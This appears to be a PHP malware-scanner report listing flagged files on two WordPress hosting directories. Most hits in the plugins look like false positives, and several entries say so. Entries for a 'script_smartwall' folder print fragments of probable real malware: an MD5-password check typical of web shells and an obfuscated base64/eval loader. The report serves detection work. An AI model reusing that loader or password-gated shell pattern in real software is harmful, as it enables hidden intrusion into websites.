//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/wordpress-seo-premium/premium/classes/redirect/redirect-validator.php Size: 4.64 kB Created: 2021-06-25 13:23:25 Modified: 2021-06-25 13:23:25 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 140 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$validation_rule['validation_class']()
|
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/wp-asset-clean-up-pro/classes/OwnAssets.php Size: 44.62 kB Created: 2021-06-25 13:23:27 Modified: 2021-06-25 13:23:27 Warns: 1
| Description | Match |
|---|
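Function system Warning Potentially dangerous function `system` [https://www.php.net/system]. Note: the match below appears to be the English word "system" followed by a parenthesis inside a translatable string (the text ends in `', 'wp-asset-clean-up')`), not a call to PHP's system(); likely a false positive. |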
system (e.g. you are using the website for business purposes, to showcase your products and you are not using it as a blog where people leave comments to your posts).', 'wp-asset-clean-up')."\n\n". __('If you are not sure about whether activating this option is right or not, it is better to leave it as it is (to be loaded by default).', 'wp-asset-clean-up')."\n\n". __('Confirm this action to enable the unloading or cancel to leave it loaded by default.', 'wp-asset-clean-up'); $wpacuObjectData['r...
|
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/FontsGoogle.php Size: 23.64 kB Created: 2021-06-25 13:23:27 Modified: 2021-06-25 13:23:27 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 656 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/MinifyJs.php Size: 10.11 kB Created: 2021-06-25 13:23:27 Modified: 2021-06-25 13:23:27 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 137 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/wp-asset-clean-up-pro/classes/Tools.php Size: 32.60 kB Created: 2021-06-25 13:23:27 Modified: 2021-06-25 13:23:27 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 328 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
|
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/wp-asset-clean-up-pro/pro/classes/OptimiseAssets/OptimizeJsPro.php Size: 8.80 kB Created: 2021-06-25 13:23:27 Modified: 2021-06-25 13:23:27 Dangers: 2
| Description | Match |
|---|
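Exploit execution2 Dangerous RCE (Remote Code Execution) allows remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]. Note: the matched text below runs from an `array_filter($allPatterns)` call with no callback argument to an `array_key_exists(..., $_GET)` check in a different method, so the rule appears to have matched across unrelated statements; compare with a clean copy of the plugin before treating it as a backdoor. |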
array_filter($allPatterns); } public static function isInlineJsEnabled() { $isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] && (trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled())); if (! $isEnabledInSettingsWithListOrAuto) { return false; } if (array_key_exists('wpacu_no_inline_js', $_GET)
| Exploit execution2 Line: 36 Dangerous RCE (Remote Code Execution) allows remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
array_filter($allPatterns); }
/** * @return bool */ public static function isInlineJsEnabled() { $isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] && (trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled()));
if (! $isEnabledInSettingsWithListOrAuto) { return false; }
// Deactivate it for debugging purposes via query string /?wpacu_no_inline_js if (array_key_e...
|
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/wp-asset-clean-up-pro/templates/_admin-page-settings-plugin-areas/_fonts-google/_optimize-area.php Size: 13.93 kB Created: 2021-06-25 13:23:27 Modified: 2021-06-25 13:23:27 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 71 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/wp-asset-clean-up-pro/vendor/rawr/t-regx/src/SafeRegex/preg.php Size: 3.43 kB Created: 2021-06-25 13:23:27 Modified: 2021-06-25 13:23:27 Dangers: 1
| Description | Match |
|---|
Sign 696317c4 Line: 27 Dangerous Malware Signature (hash: 696317c4) |
@preg_replace
|
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/wp-asset-clean-up-pro/vendor/matthiasmullie/minify/src/JS.php Size: 38.32 kB Created: 2021-06-25 13:23:27 Modified: 2021-06-25 13:23:27 Warns: 1
| Description | Match |
|---|
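Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec]. Note: the match below sits inside a quoted list of what look like JavaScript method names (`'exec(', 'test(', 'toSource(', 'toString('`) assigned to `$propertiesAndMethods`, i.e. string data in the minifier rather than a call to PHP's exec(); likely a false positive. |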
exec(', 'test(', 'toSource(', 'toString(', ); $delimiters = array_fill(0, count($propertiesAndMethods), '/'); $propertiesAndMethods = array_map('preg_quote', $propertiesAndMethods, $delimiters); $after = '(?=\s*([\.,;\)\}&\|+]|\/\/|$|\.('.implode('|', $propertiesAndMethods).')))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $callback); $before = '\)\s*'; $after = '(?=\s*\.('.implode('|', $propertiesAndMethods).'))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $c...
|
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Helper/HTML.php Size: 24.21 kB Created: 2021-06-25 13:23:28 Modified: 2021-06-25 13:23:28 Dangers: 1
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Reader/Excel5.php Size: 285.98 kB Created: 2021-06-25 13:23:28 Modified: 2021-06-25 13:23:28 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 7580 Dangerous Hacker credits |
Hacked by
|
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/File.php Size: 5.87 kB Created: 2021-06-25 13:23:28 Modified: 2021-06-25 13:23:28 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 176 Dangerous Malware Signature (hash: 471b95ee) |
Suhosin
|
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/PCLZip/pclzip.lib.php Size: 209.23 kB Created: 2021-06-25 13:23:28 Modified: 2021-06-25 13:23:28 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2454 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2588 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3386 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3575 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5162 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/OLERead.php Size: 10.98 kB Created: 2021-06-25 13:23:28 Modified: 2021-06-25 13:23:28 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 308 Dangerous Hacker credits |
Hacked by
|
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/wp-all-import-pro/helpers/functions.php Size: 8.30 kB Created: 2021-06-25 13:23:28 Modified: 2021-06-25 13:23:28 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval ("return ($str);")) ? $then : $else; } } if ( ! function_exists('is_empty') ) { function is_empty( $var ) { return empty($var); } } if ( ! function_exists('pmxi_human_filesize') ) { function pmxi_human_filesize($bytes, $decimals = 2) { $sz = 'BKMGTP'; $factor = (int) floor((strlen($bytes) - 1) / 3); return sprintf("%.{$decimals}f", $bytes / pow(1024, $factor)) . (isset($sz[$factor]) ? $sz[$factor] : ''); } } if ( ! function_exists('pmxi_get_remote_image_ext') ) { function pmxi_get_remote_im...
|
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/wp-all-import-pro/libraries/pclzip.lib.php Size: 185.99 kB Created: 2021-06-25 13:23:28 Modified: 2021-06-25 13:23:28 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2458 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2592 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3390 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3579 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5166 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/wp-all-import-pro/actions/wp_ajax_import_failed.php Size: 799.00 B Created: 2021-06-25 13:23:28 Modified: 2021-06-25 13:23:28 Dangers: 1
| Description | Match |
|---|
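Exploit extract_global Line: 12 Dangerous Code injection: extracting a global request array such as `$_POST` into the local scope lets request parameters create or overwrite variables, which allows remote attackers to inject PHP code on the target machine via an HTTP request |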
extract($_POST)
|
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/ajax-search-pro/includes/classes/ajax/class-asp-search.php Size: 5.79 kB Created: 2021-06-25 13:23:28 Modified: 2021-06-25 13:23:28 Dangers: 1
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/ajax-search-pro/includes/classes/core/class-asp-init.php Size: 28.14 kB Created: 2021-06-25 13:23:28 Modified: 2021-06-25 13:23:28 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 383 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/ajax-search-pro/includes/classes/etc/class-asp_helpers.php Size: 82.97 kB Created: 2021-06-25 13:23:28 Modified: 2021-06-25 13:23:28 Dangers: 1
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/include/tcpdf_colors.php Size: 14.36 kB Created: 2021-06-25 13:23:28 Modified: 2021-06-25 13:23:28 Dangers: 1
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/tcpdf_barcodes_1d.php Size: 71.69 kB Created: 2021-06-25 13:23:28 Modified: 2021-06-25 13:23:28 Warns: 3
| Description | Match |
|---|
Exploit too_many_chr Line: 1071 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(0).chr(1).chr(2).chr(3).chr(4).chr(5).chr(6).chr(7).
| Exploit too_many_chr Line: 1072 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(10).chr(11).chr(12).chr(13).chr(14).chr(15).chr(16).chr(17).
| Exploit too_many_chr Line: 1073 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(20).chr(21).chr(22).chr(23).chr(24).chr(25).chr(26).chr(27).
|
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/ajax-search-pro/backend/search.php Size: 21.91 kB Created: 2021-06-25 13:23:28 Modified: 2021-06-25 13:23:28 Dangers: 1
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxonomy_term_select.class.php Size: 25.39 kB Created: 2021-06-25 13:23:28 Modified: 2021-06-25 13:23:28 Dangers: 1
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cf_search_callback.class.php Size: 6.03 kB Created: 2021-06-25 13:23:28 Modified: 2021-06-25 13:23:28 Dangers: 1
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_user_select.class.php Size: 8.51 kB Created: 2021-06-25 13:23:28 Modified: 2021-06-25 13:23:28 Dangers: 1
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxterm_search_callback.class.php Size: 5.94 kB Created: 2021-06-25 13:23:28 Modified: 2021-06-25 13:23:28 Dangers: 1
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/ajax-search-pro/backend/settings/class/type.class.php Size: 5.81 kB Created: 2021-06-25 13:23:28 Modified: 2021-06-25 13:23:28 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 98 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$val['func']($this->newData)
|
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cpt_select.class.php Size: 7.36 kB Created: 2021-06-25 13:23:28 Modified: 2021-06-25 13:23:28 Dangers: 1
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/ajax-search-pro/backend/settings/class/languageselect.class.php Size: 6.91 kB Created: 2021-06-25 13:23:28 Modified: 2021-06-25 13:23:28 Dangers: 1
| Description | Match |
|---|
Function str_rot13 eval_str_rot13 Line: 177 Dangerous Encoded Function `eval` [https://www.php.net/eval] |
riny
|
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/script_smartwall/update.php Size: 9.06 kB Created: 2021-06-25 13:21:32 Modified: 2021-06-25 13:21:32 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 9 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 9 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/script_smartwall/index.php Size: 38.45 kB Created: 2021-06-25 13:21:32 Modified: 2021-06-25 13:21:32 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 19 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 19 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/script_smartwall/smartwall.php Size: 8.87 kB Created: 2021-06-25 13:21:32 Modified: 2021-06-25 13:21:32 Warns: 2 Dangers: 3
| Description | Match |
|---|
Exploit base64_long Line: 2 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
'bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxUAq2mWzWmlIBhaIFjWGnCWJQlSOEgDQJaBIIBYJdiDPGhLRCa83gK...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("return $r;");} eval('?>'.ETOHERlTjcnxEbfSJHvr('bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxU...
| Sign 11413268 Line: 2 Dangerous Malware Signature (hash: 11413268) |
eval('?>
| Sign 7f5d33bf Line: 2 Dangerous Malware Signature (hash: 7f5d33bf) |
Jhc2U2N
| Sign d97f004d Line: 2 Dangerous Malware Signature (hash: d97f004d). The matched string is the Base64 encoding of `gzinflate`. |
Z3ppbmZsYXRl
|
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/profile-builder-pro/modules/user-listing/userlisting.php Size: 128.34 kB Created: 2020-03-07 13:22:42 Modified: 2020-07-24 20:05:17 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 1185 Warning Double var technique is usually used for the obfuscation of malicious code |
${$gloabl_filter_ids_name}
|
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/wordpress-seo-premium/premium/classes/redirect/redirect-validator.php Size: 4.64 kB Created: 2020-01-13 17:39:15 Modified: 2020-07-24 20:05:17 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 140 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$validation_rule['validation_class']()
|
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/OwnAssets.php Size: 44.62 kB Created: 2021-05-16 14:30:26 Modified: 2021-05-16 14:30:26 Warns: 1
| Description | Match |
|---|
Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system (e.g. you are using the website for business purposes, to showcase your products and you are not using it as a blog where people leave comments to your posts).', 'wp-asset-clean-up')."\n\n". __('If you are not sure about whether activating this option is right or not, it is better to leave it as it is (to be loaded by default).', 'wp-asset-clean-up')."\n\n". __('Confirm this action to enable the unloading or cancel to leave it loaded by default.', 'wp-asset-clean-up'); $wpacuObjectData['r...
|
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/FontsGoogle.php Size: 23.64 kB Created: 2021-05-16 14:30:26 Modified: 2021-05-16 14:30:26 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 656 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/MinifyJs.php Size: 10.11 kB Created: 2021-05-16 14:30:26 Modified: 2021-05-16 14:30:26 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 137 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/Tools.php Size: 32.60 kB Created: 2021-05-16 14:30:26 Modified: 2021-05-16 14:30:26 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 328 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
|
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/wp-asset-clean-up-pro/pro/classes/OptimiseAssets/OptimizeJsPro.php Size: 8.80 kB Created: 2021-05-16 14:30:26 Modified: 2021-05-16 14:30:26 Dangers: 2
| Description | Match |
|---|
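Exploit execution2 Dangerous RCE (Remote Code Execution): allows remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]. In the excerpt matched below, `array_filter()` is called without a callback and `$_GET` is only tested with `array_key_exists()`, so review the file itself before treating this hit as confirmed. |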
array_filter($allPatterns); } public static function isInlineJsEnabled() { $isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] && (trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled())); if (! $isEnabledInSettingsWithListOrAuto) { return false; } if (array_key_exists('wpacu_no_inline_js', $_GET)
| Exploit execution2 Line: 36 Dangerous RCE (Remote Code Execution): allows remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
array_filter($allPatterns); }
/** * @return bool */ public static function isInlineJsEnabled() { $isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] && (trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled()));
if (! $isEnabledInSettingsWithListOrAuto) { return false; }
// Deactivate it for debugging purposes via query string /?wpacu_no_inline_js if (array_key_e...
|
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/wp-asset-clean-up-pro/templates/_admin-page-settings-plugin-areas/_fonts-google/_optimize-area.php Size: 13.93 kB Created: 2021-05-16 14:30:26 Modified: 2021-05-16 14:30:26 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 71 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/wp-asset-clean-up-pro/vendor/rawr/t-regx/src/SafeRegex/preg.php Size: 3.43 kB Created: 2021-05-16 14:30:26 Modified: 2021-05-16 14:30:26 Dangers: 1
| Description | Match |
|---|
Sign 696317c4 Line: 27 Dangerous Malware Signature (hash: 696317c4) |
@preg_replace
|
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/wp-asset-clean-up-pro/vendor/matthiasmullie/minify/src/JS.php Size: 38.32 kB Created: 2021-05-16 14:30:26 Modified: 2021-05-16 14:30:26 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec(', 'test(', 'toSource(', 'toString(', ); $delimiters = array_fill(0, count($propertiesAndMethods), '/'); $propertiesAndMethods = array_map('preg_quote', $propertiesAndMethods, $delimiters); $after = '(?=\s*([\.,;\)\}&\|+]|\/\/|$|\.('.implode('|', $propertiesAndMethods).')))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $callback); $before = '\)\s*'; $after = '(?=\s*\.('.implode('|', $propertiesAndMethods).'))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $c...
|
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Helper/HTML.php Size: 24.21 kB Created: 2020-02-13 15:50:39 Modified: 2020-07-24 20:05:17 Dangers: 1
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Reader/Excel5.php Size: 285.78 kB Created: 2020-02-13 15:50:39 Modified: 2020-07-24 20:05:17 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 7576 Dangerous Hacker credits |
Hacked by
|
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/File.php Size: 5.87 kB Created: 2020-02-13 15:50:39 Modified: 2020-07-24 20:05:17 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 176 Dangerous Malware Signature (hash: 471b95ee) |
Suhosin
|
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/PCLZip/pclzip.lib.php Size: 209.23 kB Created: 2020-02-13 15:50:39 Modified: 2020-07-24 20:05:17 Dangers: 5
| Description | Match |
|---|
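Exploit nano Line: 2454 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]. The rule appears to fire on any call through a variable; in this match the callee is read from `$p_options` under a `PCLZIP_CB_*` key, so compare the file with a known-good copy of the library before treating the hit as a webshell. |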
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2588 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3386 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3575 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
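| Sign 963e968a Line: 5162 Dangerous Malware Signature (hash: 963e968a). The matched text is only a call to the built-in `php_uname()` function, which on its own does not show that the file was tampered with. |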
php_uname()
|
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/OLERead.php Size: 10.98 kB Created: 2020-02-13 15:50:39 Modified: 2020-07-24 20:05:17 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 308 Dangerous Hacker credits |
Hacked by
|
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/wp-all-import-pro/helpers/functions.php Size: 8.30 kB Created: 2020-02-13 15:50:39 Modified: 2020-07-24 20:05:17 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval ("return ($str);")) ? $then : $else; } } if ( ! function_exists('is_empty') ) { function is_empty( $var ) { return empty($var); } } if ( ! function_exists('pmxi_human_filesize') ) { function pmxi_human_filesize($bytes, $decimals = 2) { $sz = 'BKMGTP'; $factor = (int) floor((strlen($bytes) - 1) / 3); return sprintf("%.{$decimals}f", $bytes / pow(1024, $factor)) . (isset($sz[$factor]) ? $sz[$factor] : ''); } } if ( ! function_exists('pmxi_get_remote_image_ext') ) { function pmxi_get_remote_im...
|
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/wp-all-import-pro/libraries/pclzip.lib.php Size: 185.99 kB Created: 2020-02-13 15:50:39 Modified: 2020-07-24 20:05:17 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2458 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2592 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3390 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
